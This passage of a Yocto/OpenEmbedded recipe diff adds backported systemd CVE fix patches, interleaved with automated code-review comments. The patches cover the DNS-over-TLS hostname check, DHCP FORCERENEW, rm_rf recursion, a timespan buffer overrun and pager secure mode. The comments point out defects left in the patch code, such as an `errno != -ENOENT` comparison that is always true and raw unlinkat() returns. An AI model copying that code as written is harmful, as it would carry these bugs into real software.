60- stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
61- stream->dnstls_data.validation.size = 4;
62- } else {
63- stream->dnstls_data.validation.data = server->address.in6.s6_addr;
64- stream->dnstls_data.validation.size = 16;
65+ if (server->server_name)
66+ gnutls_session_set_verify_cert(gs, server->server_name, 0);
67+ else {
68+ stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
69+ if (server->family == AF_INET) {
70+ stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
71+ stream->dnstls_data.validation.size = 4;
72+ } else {
73+ stream->dnstls_data.validation.data = server->address.in6.s6_addr;
74+ stream->dnstls_data.validation.size = 16;
75+ }
76+ gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
77 }
78- gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
79 }
80
81 gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
82diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
83index 85e202ff74..007aedaa5b 100644
84--- a/src/resolve/resolved-dnstls-openssl.c
85+++ b/src/resolve/resolved-dnstls-openssl.c
86@@ -6,6 +6,7 @@
87
88 #include <openssl/bio.h>
89 #include <openssl/err.h>
90+#include <openssl/x509v3.h>
91
92 #include "io-util.h"
93 #include "resolved-dns-stream.h"
94@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
95
96 if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
97 X509_VERIFY_PARAM *v;
98- const unsigned char *ip;
99
100 SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
101 v = SSL_get0_param(s);
102- ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
103- if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
104- return -ECONNREFUSED;
105+ if (server->server_name) {
106+ X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
107+ if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
108+ return -ECONNREFUSED;
109+ } else {
110+ const unsigned char *ip;
111+ ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
112+ if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
113+ return -ECONNREFUSED;
114+ }
115 }
116
117 ERR_clear_error();
118--
1192.40.1
120
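Review bot: The rewritten `DNSOverTLS=` paragraph states that the configured server name is also used to enable SNI, but neither backend hunk sets it: the GnuTLS side only adds `gnutls_session_set_verify_cert(gs, server->server_name, 0)` and the OpenSSL side only `X509_VERIFY_PARAM_set1_host(v, server->server_name, 0)`. Both hunks also depend on `server->server_name` being filled in from `DNS=address#server_name`, which this patch does not add; if the change that introduces that field and its parsing is not part of the v244 backport series, the hostname branch is never taken and strict mode keeps validating against the IP only. It is worth confirming that dependency is applied, and either backporting the SNI change or dropping the SNI sentence from the man page text. `dnstls_stream_connect_tls()` continues outside both hunks, so an SNI call may already exist there.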
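diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
+From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
+CVE: CVE-2020-13529
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+ if (r != DHCP_FORCERENEW)
+ return -ENOMSG;
+
++#if 0
+ log_dhcp_client(client, "FORCERENEW");
+
+ return 0;
++#else
++ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++ return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {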
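diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
+Backport of:
+
+From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
+
+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turns uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
+CVE: CVE-2021-33910
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+- char *p, *s;
++ _cleanup_free_ char *p = NULL;
++ char *s;
+
+ assert(f);
+ assert(ret);
+
+- p = strdupa(f);
++ p = strdup(f);
+ if (!p)
+ return -ENOMEM;
+
+@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+ if (!path_is_normalized(p))
+ return -EINVAL;
+
+- /* Truncate trailing slashes */
++ /* Truncate trailing slashes and skip leading slashes */
+ delete_trailing_chars(p, "/");
+-
+- /* Truncate leading slashes */
+- p = skip_leading_chars(p, "/");
+-
+- s = unit_name_escape(p);
++ s = unit_name_escape(skip_leading_chars(p, "/"));
+ }
+ if (!s)
+ return -ENOMEM;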
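diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
+Backport of the following upstream commit:
+From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 15:55:45 +0100
+Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
+ code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 27 +++++++++------------------
+ 1 file changed, 9 insertions(+), 18 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -34,7 +34,7 @@
+ const struct stat *root_dev) {
+
+ struct stat st;
+- int r;
++ int r, q = 0;
+
+ assert(fd >= 0);
+ assert(fname);
+@@ -50,7 +50,6 @@
+
+ if (is_dir) {
+ _cleanup_close_ int subdir_fd = -1;
+- int q;
+
+ /* if root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+@@ -86,23 +85,15 @@
+ * again for each directory */
+ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+
+- r = unlinkat(fd, fname, AT_REMOVEDIR);
+- if (r < 0)
+- return r;
+- if (q < 0)
+- return q;
+-
+- return 1;
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+- r = unlinkat(fd, fname, 0);
+- if (r < 0)
+- return r;
+-
+- return 1;
+- }
++ } else if (flags & REMOVE_ONLY_DIRECTORIES)
++ return 0;
+
+- return 0;
++ r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++ return 1;
+ }
+
+ int rm_rf_children(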
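Review bot: The consolidated `r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0); if (r < 0) return r;` returns the raw unlinkat() result, which is -1 with the reason left in errno, so every failure is reported as -1 (numerically -EPERM) and a caller's `r != -ENOENT` filter never matches an entry that has already gone. The removed lines follow the same pattern, so this is carried over rather than introduced, but the refactor is the natural place to correct it: `if (unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0) < 0) return -errno;`. The same raw-return pattern appears in CVE-2021-3997-3.patch at `r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);`. The function starts outside this hunk.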
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
1Backport of the following upstream commit:
2From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
3From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
4Date: Tue, 23 Nov 2021 16:56:42 +0100
5Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
6
7CVE: CVE-2021-3997
8Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
9Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
10---
11 src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
12 1 file changed, 23 insertions(+), 30 deletions(-)
13
14--- a/src/basic/rm-rf.c
15+++ b/src/basic/rm-rf.c
16@@ -159,7 +159,7 @@
17 }
18
19 int rm_rf(const char *path, RemoveFlags flags) {
20- int fd, r;
21+ int fd, r, q = 0;
22
23 assert(path);
24
25@@ -191,49 +191,47 @@
26 }
27
28 fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
29- if (fd < 0) {
30+ if (fd >= 0) {
31+ /* We have a dir */
32+ r = rm_rf_children(fd, flags, NULL);
33+
34+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
35+ q = rmdir(path);
36+ if (q < 0)
37+ q = -errno;
38+ }
39+ } else {
40 if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
41 return 0;
42
43 if (!IN_SET(errno, ENOTDIR, ELOOP))
44 return -errno;
45
46- if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
47+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
48 return 0;
49
50- if (FLAGS_SET(flags, REMOVE_ROOT)) {
51-
52- if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
53- struct statfs s;
54-
55- if (statfs(path, &s) < 0)
56- return -errno;
57- if (is_physical_fs(&s))
58- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
59- "Attempted to remove files from a disk file system under \"%s\", refusing.",
60- path);
61- }
62-
63- if (unlink(path) < 0) {
64- if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
65- return 0;
66+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
67+ struct statfs s;
68
69+ if (statfs(path, &s) < 0)
70 return -errno;
71- }
72+ if (is_physical_fs(&s))
73+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
74+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
75+ path);
76 }
77
78- return 0;
79+ r = 0;
80+ q = unlink(path);
81+ if (q < 0)
82+ q = -errno;
83 }
84
85- r = rm_rf_children(fd, flags, NULL);
86-
87- if (FLAGS_SET(flags, REMOVE_ROOT) &&
88- rmdir(path) < 0 &&
89- r >= 0 &&
90- (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
91- r = -errno;
92-
93- return r;
94+ if (r < 0)
95+ return r;
96+ if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
97+ return q;
98+ return 0;
99 }
100
101 int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
1Backport of the following upstream commit:
2From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
3From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
4Date: Tue, 30 Nov 2021 22:29:05 +0100
5Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
6 instead of recursing
7
8To remove directory structures, we need to remove the innermost items first,
9and then recursively remove higher-level directories. We would recursively
10descend into directories and invoke rm_rf_children and rm_rm_children_inner.
11This is problematic when too many directories are nested.
12
13Instead, let's create a "TODO" queue. In the the queue, for each level we
14hold the DIR* object we were working on, and the name of the directory. This
15allows us to leave a partially-processed directory, and restart the removal
16loop one level down. When done with the inner directory, we use the name to
17unlinkat() it from the parent, and proceed with the removal of other items.
18
19Because the nesting is increased by one level, it is best to view this patch
20with -b/--ignore-space-change.
21
22This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
23The issue was reported and patches reviewed by Qualys Team.
24Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
25
26CVE: CVE-2021-3997
27Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
28Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
29---
30 src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
31 1 file changed, 113 insertions(+), 48 deletions(-)
32
33--- a/src/basic/rm-rf.c
34+++ b/src/basic/rm-rf.c
35@@ -26,12 +26,13 @@
36 return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
37 }
38
39-static int rm_rf_children_inner(
40+static int rm_rf_inner_child(
41 int fd,
42 const char *fname,
43 int is_dir,
44 RemoveFlags flags,
45- const struct stat *root_dev) {
46+ const struct stat *root_dev,
47+ bool allow_recursion) {
48
49 struct stat st;
50 int r, q = 0;
51@@ -49,9 +50,7 @@
52 }
53
54 if (is_dir) {
55- _cleanup_close_ int subdir_fd = -1;
56-
57- /* if root_dev is set, remove subdirectories only if device is same */
58+ /* If root_dev is set, remove subdirectories only if device is same */
59 if (root_dev && st.st_dev != root_dev->st_dev)
60 return 0;
61
62@@ -63,7 +62,6 @@
63 return 0;
64
65 if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
66-
67 /* This could be a subvolume, try to remove it */
68
69 r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
70@@ -77,13 +75,16 @@
71 return 1;
72 }
73
74- subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
75+ if (!allow_recursion)
76+ return -EISDIR;
77+
78+ int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
79 if (subdir_fd < 0)
80 return -errno;
81
82 /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
83 * again for each directory */
84- q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
85+ q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
86
87 } else if (flags & REMOVE_ONLY_DIRECTORIES)
88 return 0;
89@@ -96,64 +97,128 @@
90 return 1;
91 }
92
93+typedef struct TodoEntry {
94+ DIR *dir; /* A directory that we were operating on. */
95+ char *dirname; /* The filename of that directory itself. */
96+} TodoEntry;
97+
98+static void free_todo_entries(TodoEntry **todos) {
99+ for (TodoEntry *x = *todos; x && x->dir; x++) {
100+ closedir(x->dir);
101+ free(x->dirname);
102+ }
103+
104+ freep(todos);
105+}
106+
107 int rm_rf_children(
108 int fd,
109 RemoveFlags flags,
110 const struct stat *root_dev) {
111
112- _cleanup_closedir_ DIR *d = NULL;
113- struct dirent *de;
114+ _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
115+ size_t n_todo = 0, allocated = 0;
116+ _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
117 int ret = 0, r;
118
119- assert(fd >= 0);
120+ /* Return the first error we run into, but nevertheless try to go on.
121+ * The passed fd is closed in all cases, including on failure. */
122
123- /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
124- * fd, in all cases, including on failure. */
125+ for (;;) { /* This loop corresponds to the directory nesting level. */
126+ _cleanup_closedir_ DIR *d = NULL;
127+ struct dirent *de;
128+
129+ if (n_todo > 0) {
130+ /* We know that we are in recursion here, because n_todo is set.
131+ * We need to remove the inner directory we were operating on. */
132+ assert(dirname);
133+ r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
134+ if (r < 0 && r != -ENOENT && ret == 0)
135+ ret = r;
136+ dirname = mfree(dirname);
137+
138+ /* And now let's back out one level up */
139+ n_todo --;
140+ d = TAKE_PTR(todos[n_todo].dir);
141+ dirname = TAKE_PTR(todos[n_todo].dirname);
142+
143+ assert(d);
144+ fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
145+ assert(fd >= 0);
146+ } else {
147+ next_fd:
148+ assert(fd >= 0);
149+ d = fdopendir(fd);
150+ if (!d) {
151+ safe_close(fd);
152+ return -errno;
153+ }
154+ fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
155+ * the right descriptor even if it were to internally invalidate the
156+ * one we passed. */
157+
158+ if (!(flags & REMOVE_PHYSICAL)) {
159+ struct statfs sfs;
160+
161+ if (fstatfs(fd, &sfs) < 0)
162+ return -errno;
163+
164+ if (is_physical_fs(&sfs)) {
165+ /* We refuse to clean physical file systems with this call, unless
166+ * explicitly requested. This is extra paranoia just to be sure we
167+ * never ever remove non-state data. */
168+
169+ _cleanup_free_ char *path = NULL;
170+
171+ (void) fd_get_path(fd, &path);
172+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
173+ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
174+ strna(path));
175+ }
176+ }
177+ }
178
179- d = fdopendir(fd);
180- if (!d) {
181- safe_close(fd);
182- return -errno;
183- }
184+ FOREACH_DIRENT_ALL(de, d, return -errno) {
185+ int is_dir;
186
187- if (!(flags & REMOVE_PHYSICAL)) {
188- struct statfs sfs;
189+ if (dot_or_dot_dot(de->d_name))
190+ continue;
191
192- if (fstatfs(dirfd(d), &sfs) < 0)
193- return -errno;
194- }
195+ is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
196
197- if (is_physical_fs(&sfs)) {
198- /* We refuse to clean physical file systems with this call, unless explicitly
199- * requested. This is extra paranoia just to be sure we never ever remove non-state
200- * data. */
201-
202- _cleanup_free_ char *path = NULL;
203-
204- (void) fd_get_path(fd, &path);
205- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
206- "Attempted to remove disk file system under \"%s\", and we can't allow that.",
207- strna(path));
208- }
209- }
210+ r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
211+ if (r == -EISDIR) {
212+ /* Push the current working state onto the todo list */
213
214- FOREACH_DIRENT_ALL(de, d, return -errno) {
215- int is_dir;
216+ if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
217+ return log_oom();
218
219- if (dot_or_dot_dot(de->d_name))
220- continue;
221+ _cleanup_free_ char *newdirname = strdup(de->d_name);
222+ if (!newdirname)
223+ return log_oom();
224
225- is_dir =
226- de->d_type == DT_UNKNOWN ? -1 :
227- de->d_type == DT_DIR;
228-
229- r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
230- if (r < 0 && r != -ENOENT && ret == 0)
231- ret = r;
232- }
233+ int newfd = openat(fd, de->d_name,
234+ O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
235+ if (newfd >= 0) {
236+ todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
237+ fd = newfd;
238+ dirname = TAKE_PTR(newdirname);
239+
240+ goto next_fd;
241
242- if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
243- ret = -errno;
244+ } else if (errno != -ENOENT && ret == 0)
245+ ret = -errno;
246+
247+ } else if (r < 0 && r != -ENOENT && ret == 0)
248+ ret = r;
249+ }
250+
251+ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
252+ ret = -errno;
253+
254+ if (n_todo == 0)
255+ break;
256+ }
257
258 return ret;
259 }
260@@ -250,5 +315,5 @@
261 if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
262 return -EINVAL;
263
264- return rm_rf_children_inner(fd, name, -1, flags, NULL);
265+ return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
266 }
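Review bot: In the new todo-queue loop of `rm_rf_children()` the failed-openat branch tests `errno != -ENOENT`; errno is positive, so the comparison is always true and a directory that vanished between the readdir and the openat is recorded as an error instead of being skipped like the other -ENOENT cases. The line should read `} else if (errno != ENOENT && ret == 0)`. Concurrent removal under the tree being cleaned is the situation this function is written to tolerate, so the difference shows up as a spurious failure return from an otherwise successful cleanup.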
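diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
+From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 7 Jul 2022 18:27:02 +0900
+Subject: [PATCH] time-util: fix buffer-over-run
+
+Fixes #23928.
+
+CVE: CVE-2022-3821
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Both the hunks refreshed to backport
+
+---
+ src/basic/time-util.c | 2 +-
+ src/test/test-time-util.c | 5 +++++
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/src/basic/time-util.c b/src/basic/time-util.c
+index abbc4ad5cd70..26d59de12348 100644
+--- a/src/basic/time-util.c
++++ b/src/basic/time-util.c
+@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
+ t = b;
+ }
+
+- n = MIN((size_t) k, l);
++ n = MIN((size_t) k, l-1);
+
+ l -= n;
+ p += n;
+diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
+index e8e4e2a67bb1..58c5fa9be40c 100644
+--- a/src/test/test-time-util.c
++++ b/src/test/test-time-util.c
+@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
+ test_format_timespan(1);
+ test_format_timespan(USEC_PER_MSEC);
+ test_format_timespan(USEC_PER_SEC);
++
++ /* See issue #23928. */
++ _cleanup_free_ char *buf;
++ assert_se(buf = new(char, 5));
++ assert_se(buf == format_timespan(buf, 5, 100005, 1000));
++
+ test_timezone_is_valid();
+ test_get_timezones();
+ test_usec_add();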
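Review bot: The regression test declares `_cleanup_free_ char *buf;` without an initializer; the cleanup handler frees whatever the pointer holds at scope exit, so this is only safe because the allocation follows on the next line, and `_cleanup_free_ char *buf = NULL;` removes that dependency. On the fix itself, `n = MIN((size_t) k, l-1);` would wrap if `l` could be 0 at that point; the guard that keeps `l` at least 1 is presumably earlier in `format_timespan()`, outside the hunk, and is worth confirming against the v244 source these refreshed hunks apply to.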
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
1From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
2From: Lennart Poettering <lennart@poettering.net>
3Date: Mon, 31 Aug 2020 19:37:13 +0200
4Subject: [PATCH] pager: set $LESSSECURE whenver we invoke a pager
5
6Some extra safety when invoked via "sudo". With this we address a
7genuine design flaw of sudo, and we shouldn't need to deal with this.
8But it's still a good idea to disable this surface given how exotic it
9is.
10
11Prompted by #5666
12
13CVE: CVE-2023-26604
14Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
15Comments: Hunk not refreshed
16Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
17---
18 man/less-variables.xml | 9 +++++++++
19 man/systemctl.xml | 1 +
20 man/systemd.xml | 1 +
21 src/shared/pager.c | 23 +++++++++++++++++++++--
22 4 files changed, 32 insertions(+), 2 deletions(-)
23
24diff --git a/man/less-variables.xml b/man/less-variables.xml
25index 08e513c99f8e..c52511ca8e18 100644
26--- a/man/less-variables.xml
27+++ b/man/less-variables.xml
28@@ -64,6 +64,15 @@
29 the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
30 </varlistentry>
31
32+ <varlistentry id='lesssecure'>
33+ <term><varname>$SYSTEMD_LESSSECURE</varname></term>
34+
35+ <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
36+ variable when invoking the pager, which controls the "secure" mode of less (which disables commands
37+ such as <literal>|</literal> which allow to easily shell out to external command lines). By default
38+ less secure mode is enabled, with this setting it may be disabled.</para></listitem>
39+ </varlistentry>
40+
41 <varlistentry id='colors'>
42 <term><varname>$SYSTEMD_COLORS</varname></term>
43
44diff --git a/man/systemctl.xml b/man/systemctl.xml
45index 1c5502883700..a3f0c3041a57 100644
46--- a/man/systemctl.xml
47+++ b/man/systemctl.xml
48@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
49 <xi:include href="less-variables.xml" xpointer="pager"/>
50 <xi:include href="less-variables.xml" xpointer="less"/>
51 <xi:include href="less-variables.xml" xpointer="lesscharset"/>
52+ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
53 <xi:include href="less-variables.xml" xpointer="colors"/>
54 <xi:include href="less-variables.xml" xpointer="urlify"/>
55 </refsect1>
56diff --git a/man/systemd.xml b/man/systemd.xml
57index a9040545c2ab..c92cfef77689 100644
58--- a/man/systemd.xml
59+++ b/man/systemd.xml
60@@ -692,6 +692,7 @@
61 <xi:include href="less-variables.xml" xpointer="pager"/>
62 <xi:include href="less-variables.xml" xpointer="less"/>
63 <xi:include href="less-variables.xml" xpointer="lesscharset"/>
64+ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
65 <xi:include href="less-variables.xml" xpointer="colors"/>
66 <xi:include href="less-variables.xml" xpointer="urlify"/>
67
68diff --git a/src/shared/pager.c b/src/shared/pager.c
69index e03be6d23b2d..9c21881241f5 100644
70--- a/src/shared/pager.c
71+++ b/src/shared/pager.c
72@@ -9,6 +9,7 @@
73 #include <unistd.h>
74
